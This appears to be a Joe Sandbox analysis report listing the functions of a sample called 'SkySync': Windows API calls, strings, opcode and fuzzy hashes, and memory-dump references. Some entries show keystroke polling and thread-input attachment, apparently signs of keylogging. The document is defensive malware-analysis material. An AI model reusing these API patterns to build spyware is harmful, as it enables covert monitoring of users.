GetKeyboardState.USER32(?), ref: 00AF0530
GetAsyncKeyState.USER32(000000A0), ref: 00AF05B1
GetKeyState.USER32(000000A0), ref: 00AF05CC
GetAsyncKeyState.USER32(000000A1), ref: 00AF05E6
GetKeyState.USER32(000000A1), ref: 00AF05FB
GetAsyncKeyState.USER32(00000011), ref: 00AF0613
GetKeyState.USER32(00000011), ref: 00AF0625
GetAsyncKeyState.USER32(00000012), ref: 00AF063D
GetKeyState.USER32(00000012), ref: 00AF064F
GetAsyncKeyState.USER32(0000005B), ref: 00AF0667
GetKeyState.USER32(0000005B), ref: 00AF0679

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 81d01d96bc7bfd0237b7b7ef39bf74a4eef443b26c04ca6eb46d8d1c5e3cc3e4
Instruction ID: 03c450c47b795b2df2326516bb315c52e294b746d568fcd0e13968175e0220fd
Opcode Fuzzy Hash: 81d01d96bc7bfd0237b7b7ef39bf74a4eef443b26c04ca6eb46d8d1c5e3cc3e4
Instruction Fuzzy Hash: E74195705047CD6DFF7197E48804BB5BEA06F61344F088059EBC5875C3EBE899D88B92

Function 00B08AA5 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32 ref: 00B08AED
CoUninitialize.OLE32 ref: 00B08AF8
CoCreateInstance.OLE32(?,00000000,00000017,00B23BBC,?), ref: 00B08B58
IIDFromString.OLE32(?,?), ref: 00B08BCB
VariantInit.OLEAUT32(?), ref: 00B08C65
VariantClear.OLEAUT32(?), ref: 00B08CC6

Strings

Failed to create object, xrefs: 00B08B63, 00B08C19
Invalid parameter, xrefs: 00B08BE4
NULL Pointer assignment, xrefs: 00B08B9D

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 636576611-1287834457
Opcode ID: 1776fd655695db052ac8ec765a31e9799afe2a6fb3e035a3c58e180205142385
Instruction ID: 44284ca337cd1e2ece24408afdf1ce1c15e590a4f6e19f48bba92b6fe36a1725
Opcode Fuzzy Hash: 1776fd655695db052ac8ec765a31e9799afe2a6fb3e035a3c58e180205142385
Instruction Fuzzy Hash: 10619F702087119FD720DF64C989F6ABBE8EF48714F104889F9859B291DB74EE45CBA2

Function 00AFE25D Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 185timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00AFE31F
SystemTimeToFileTime.KERNEL32(?,?), ref: 00AFE32F
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00AFE33B
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00AFE3D8
SetCurrentDirectoryW.KERNEL32(?), ref: 00AFE3EC
SetCurrentDirectoryW.KERNEL32(?), ref: 00AFE41E
SetCurrentDirectoryW.KERNEL32(?), ref: 00AFE43F
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00AFE48A

Strings

*.*, xrefs: 00AFE445

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local$System
String ID: *.*
API String ID: 1464919966-438819550
Opcode ID: 26ef962c986e05d65f8063974b1c7a7a756cf1ca4c85d33f7101c061fde6cc18
Instruction ID: 9fa9b949725186ff7f9f11877db8bf5613e01e2b18a91fa73a8e7db04e96edce
Opcode Fuzzy Hash: 26ef962c986e05d65f8063974b1c7a7a756cf1ca4c85d33f7101c061fde6cc18
Instruction Fuzzy Hash: 3E616C715043499FCB10EFA4C945EAEB3E8FF89314F04491EFA8987261EB35E945CB92

Function 00AFAEEA Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 183COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,00B20980), ref: 00AFAF4E
GetDriveTypeW.KERNEL32(00000061,00B4B5F0,00000061), ref: 00AFB018

Strings

ramdisk, xrefs: 00AFAFC2
cdrom, xrefs: 00AFAF6A
fixed, xrefs: 00AFAF96
unknown, xrefs: 00AFAFD9
network, xrefs: 00AFAFAC
removable, xrefs: 00AFAF80
all, xrefs: 00AFAF54

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: BuffCharDriveLowerType
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2426244813-1000479233
Opcode ID: f82af6dc52ff908fa62eca584fd96a2e74ced09d35eadf05f6740e44e971a9e6
Instruction ID: cd273ec2fcd9a997b00a17aa6f706982a865f3acc1378f7f43b5120d235eba41
Opcode Fuzzy Hash: f82af6dc52ff908fa62eca584fd96a2e74ced09d35eadf05f6740e44e971a9e6
Instruction Fuzzy Hash: A251AC712183099FC710EF64C991EABB7F9EFA4344F104919F69A4B2A2DB30DD09CB52

Function 00AF498A Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 179COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 00AF499C
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00AF49C2
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00AF4A38

Strings

StringFileInfo\, xrefs: 00AF4A0B
DefaultLangCodepage, xrefs: 00AF4A9B
04090000, xrefs: 00AF4A6E
%u.%u.%u.%u, xrefs: 00AF4B16
\VarFileInfo\Translation, xrefs: 00AF4A30

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: FileInfoVersion$QuerySizeValue
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 2179348866-1459072770
Opcode ID: 8bf83eaa90e0a50dcc43196fcd8233cbee02a772d972d968f0511b9b92324d42
Instruction ID: 0a4e1423d59f7ae583755a747b2db268121bd7cf92fbe8cd448e64a246716def
Opcode Fuzzy Hash: 8bf83eaa90e0a50dcc43196fcd8233cbee02a772d972d968f0511b9b92324d42
Instruction Fuzzy Hash: 2C4105726002087BDB10BBB49E46EFF7BBCDF45350F000056FA04A61A3EB75DA1197A5

Function 00B05E1D Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00B05E7E
inet_addr.WSOCK32(?,?,?), ref: 00B05EC3
gethostbyname.WSOCK32(?), ref: 00B05ECF
IcmpCreateFile.IPHLPAPI ref: 00B05EDD
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00B05F4D
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00B05F63
IcmpCloseHandle.IPHLPAPI(00000000), ref: 00B05FD8
WSACleanup.WSOCK32 ref: 00B05FDE

Strings

Ping, xrefs: 00B05F01

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 8c70745f780c45dd7b4a96e98659ddb65a816d188f5594dc0bd4a2d6848c6a00
Instruction ID: 26f98e5ca3650172ec56294140b7a720e0e93583727b410a1251cdda128a6be3
Opcode Fuzzy Hash: 8c70745f780c45dd7b4a96e98659ddb65a816d188f5594dc0bd4a2d6848c6a00
Instruction Fuzzy Hash: B8517B316046019FDB20AF24CD89B2BBBE4EF48710F1445A9F995DB6E1DB74E901DF42

Function 00AFA27B Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 150COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00AFA2C2
LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00AFA2E3

Strings

Error: , xrefs: 00AFA3C4
Incorrect parameters to object property !, xrefs: 00AFA39E
"%s" (%d) : ==> %s:%s%s, xrefs: 00AFA3F7
^ ERROR , xrefs: 00AFA391
Line %d (File "%s"):, xrefs: 00AFA336, 00AFA34F
"%s" (%d) : ==> %s:, xrefs: 00AFA415

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: LoadString
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
API String ID: 2948472770-3080491070
Opcode ID: 8f310f5fa79ce1c29f52baf78382a3e238613b0480513ccfcf3cb83342ecebae
Instruction ID: 768dcf63979d6d0c551d83f42d430d33fc1ba1cbe71d4a941d8091a68a5d1132
Opcode Fuzzy Hash: 8f310f5fa79ce1c29f52baf78382a3e238613b0480513ccfcf3cb83342ecebae
Instruction Fuzzy Hash: E851B271940209BACF14EBE0DE46EEEB7B8AF15341F100165F509B30A2EB356F58DB61

Function 00B17777 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 103windowCOMMON

Download Yara Rule

APIs

CreateMenu.USER32 ref: 00B177AA
SetMenu.USER32(?,00000000), ref: 00B177B9
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B17846
IsMenu.USER32(?), ref: 00B1785C
CreatePopupMenu.USER32 ref: 00B17866
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00B17893
DrawMenuBar.USER32 ref: 00B1789B

Strings

0, xrefs: 00B17785
F, xrefs: 00B17887

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup
String ID: 0$F
API String ID: 161812096-3044882817
Opcode ID: b51e8c6b40895c467236b6ef60a85177cf0ce442a046de9d305fbabcbcba967b
Instruction ID: 0861f20998260a2c09d200160b529fd4b9043fabefce767ad9adad0419794dec
Opcode Fuzzy Hash: b51e8c6b40895c467236b6ef60a85177cf0ce442a046de9d305fbabcbcba967b
Instruction Fuzzy Hash: 67413574A00209EFDB20DF65D888AEABBF5FF49310F1445A9F945A7361DB30A950DF60

Function 00AFBB06 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00AFBB13
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00AFBB89
GetLastError.KERNEL32 ref: 00AFBB93
SetErrorMode.KERNEL32(00000000,READY), ref: 00AFBC00

Strings

NOTREADY, xrefs: 00AFBBBF
UNKNOWN, xrefs: 00AFBBB8
INVALID, xrefs: 00AFBBD2
READONLY, xrefs: 00AFBBCB
READY, xrefs: 00AFBBD9

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: 11c53bc7e641fda92bbbbd9111d51559d9468c06482febdb08fc2362d74900d3
Instruction ID: 2fcbf145b7513be2da4fc862fc2f91089414f00c8d85d3f0800713ab429c983c
Opcode Fuzzy Hash: 11c53bc7e641fda92bbbbd9111d51559d9468c06482febdb08fc2362d74900d3
Instruction Fuzzy Hash: BC31A635A1020DAFCB10EFA4C945EBDB7B8EF48314F148156FA05D7295DB709E42CB61

Function 00AE9B47 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00AEB79A: GetClassNameW.USER32(?,?,000000FF), ref: 00AEB7BD

SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00AE9BCC
GetDlgCtrlID.USER32 ref: 00AE9BD7
GetParent.USER32 ref: 00AE9BF3
SendMessageW.USER32(00000000,?,00000111,?), ref: 00AE9BF6
GetDlgCtrlID.USER32(?), ref: 00AE9BFF
GetParent.USER32(?), ref: 00AE9C1B
SendMessageW.USER32(00000000,?,?,00000111), ref: 00AE9C1E

Strings

ListBox, xrefs: 00AE9B89
ComboBox, xrefs: 00AE9B54

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName
String ID: ComboBox$ListBox
API String ID: 2573188126-1403004172
Opcode ID: b961e067edb9974880cb2a5c96cdf5ce9bacdeb3b693e19dba12da03aa92fbd2
Instruction ID: c47ba872dc71048b48cdadd4ea9cf6159d63a696d157c6006ead0bf61c744ed8
Opcode Fuzzy Hash: b961e067edb9974880cb2a5c96cdf5ce9bacdeb3b693e19dba12da03aa92fbd2
Instruction Fuzzy Hash: 2D21CF74A00204BFDF15BBA5CC85EFEBBB9EF96310F100155F961932E2EB7459299B20

Function 00AE9C32 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00AEB79A: GetClassNameW.USER32(?,?,000000FF), ref: 00AEB7BD

SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00AE9CB5
GetDlgCtrlID.USER32 ref: 00AE9CC0
GetParent.USER32 ref: 00AE9CDC
SendMessageW.USER32(00000000,?,00000111,?), ref: 00AE9CDF
GetDlgCtrlID.USER32(?), ref: 00AE9CE8
GetParent.USER32(?), ref: 00AE9D04
SendMessageW.USER32(00000000,?,?,00000111), ref: 00AE9D07

Strings

ListBox, xrefs: 00AE9C74
ComboBox, xrefs: 00AE9C3F

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName
String ID: ComboBox$ListBox
API String ID: 2573188126-1403004172
Opcode ID: cd3647c8d7cf6e4472aecbaaf423d872356cdc20661d6d3720f80eb8bb818923
Instruction ID: c42c1765dd0a219bf86fd3f8eaf3456d73463cb3b938da4dbd47b39def0a46fe
Opcode Fuzzy Hash: cd3647c8d7cf6e4472aecbaaf423d872356cdc20661d6d3720f80eb8bb818923
Instruction Fuzzy Hash: 3021F275A40204BFDF11AFA2CD85EFEBBB9EF95300F100111F951932A2DB758929DB20

Function 00B08F95 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00B08FC1
CoInitialize.OLE32(00000000), ref: 00B08FEE
CoUninitialize.OLE32 ref: 00B08FF8
GetRunningObjectTable.OLE32(00000000,?), ref: 00B090F8
SetErrorMode.KERNEL32(00000001,00000029), ref: 00B09225
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00B23BDC), ref: 00B09259
CoGetObject.OLE32(?,00000000,00B23BDC,?), ref: 00B0927C
SetErrorMode.KERNEL32(00000000), ref: 00B0928F
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00B0930F
VariantClear.OLEAUT32(?), ref: 00B0931F

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
String ID:
API String ID: 2395222682-0
Opcode ID: a37d5e41efacecaebb4d48b515e13b4bc49907584edf5573a1985feb83f4fcf9
Instruction ID: 3d0ae85da399287e16dd36a1fd44a6599ccb8275b210b605483a4306d1afdb3a
Opcode Fuzzy Hash: a37d5e41efacecaebb4d48b515e13b4bc49907584edf5573a1985feb83f4fcf9
Instruction Fuzzy Hash: CAC11971608305AFD700EF64C88496BBBE9FF89748F00495DF58A9B292DB71ED06CB52

Function 00AF2CCE Relevance: 15.2, APIs: 10, Instructions: 190windowsleepCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(00B57890,000000FF,00000000,00000030), ref: 00AF2D4A
SetMenuItemInfoW.USER32(00B57890,00000004,00000000,00000030), ref: 00AF2D80
Sleep.KERNEL32(000001F4), ref: 00AF2D92
GetMenuItemCount.USER32(?), ref: 00AF2DD6
GetMenuItemID.USER32(?,00000000), ref: 00AF2DF2
GetMenuItemID.USER32(?,-00000001), ref: 00AF2E1C
GetMenuItemID.USER32(?,?), ref: 00AF2E61
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00AF2EA7
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00AF2EBB
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00AF2EDC

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep
String ID:
API String ID: 1460738036-0
Opcode ID: e05c4e0e19a08b3d814307dfdae7aaf745d5c2c965576c608b61d8937118445e
Instruction ID: 6b5a5f2a7c7829e1c1cc010191f4c7ce7ee46393585d5a63c4d520b89d00b6a1
Opcode Fuzzy Hash: e05c4e0e19a08b3d814307dfdae7aaf745d5c2c965576c608b61d8937118445e
Instruction Fuzzy Hash: E9616C7090024DAFEB21DFA4DD88BBEBFB9EB41304F244559FA41A7251DB31AD06DB21

Function 00B17548 Relevance: 15.2, APIs: 10, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00B175CA
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00B175CD
GetWindowLongW.USER32(?,000000F0), ref: 00B175F1
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00B17614
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00B1768C

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: MessageSend$LongWindow
String ID:
API String ID: 312131281-0
Opcode ID: 4b9042bf615f83aa14918f8e161fd30d065c5f861fea91a9c1583eb4ed4c2603
Instruction ID: b37644ffbc02c383895b97a3ddd780dd18c3f82c6ac5e3d9d9220a1052fb8ecf
Opcode Fuzzy Hash: 4b9042bf615f83aa14918f8e161fd30d065c5f861fea91a9c1583eb4ed4c2603
Instruction Fuzzy Hash: 23618B75A44208AFDB10DFA4CC85EEE77F8EB09710F500199FA14E72A1DB70AE85DB60

Function 00AF19CD Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00AF19EF
GetForegroundWindow.USER32(00000000,?,?,?,?,?,00AF0A67,?,00000001), ref: 00AF1A03
GetWindowThreadProcessId.USER32(00000000), ref: 00AF1A0A
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00AF0A67,?,00000001), ref: 00AF1A19
GetWindowThreadProcessId.USER32(?,00000000), ref: 00AF1A2B
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00AF0A67,?,00000001), ref: 00AF1A44
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00AF0A67,?,00000001), ref: 00AF1A56
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00AF0A67,?,00000001), ref: 00AF1A9B
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00AF0A67,?,00000001), ref: 00AF1AB0
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00AF0A67,?,00000001), ref: 00AF1ABB

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: 484b110fd3e6ce4c294e3d53dda7c2399a2282f981dbfde8bfe2ad0c3676dc32
Instruction ID: aff60c64587fcd4080911f7021c88782a06f27234b676e5dd0d9f02e2e3c4e15
Opcode Fuzzy Hash: 484b110fd3e6ce4c294e3d53dda7c2399a2282f981dbfde8bfe2ad0c3676dc32
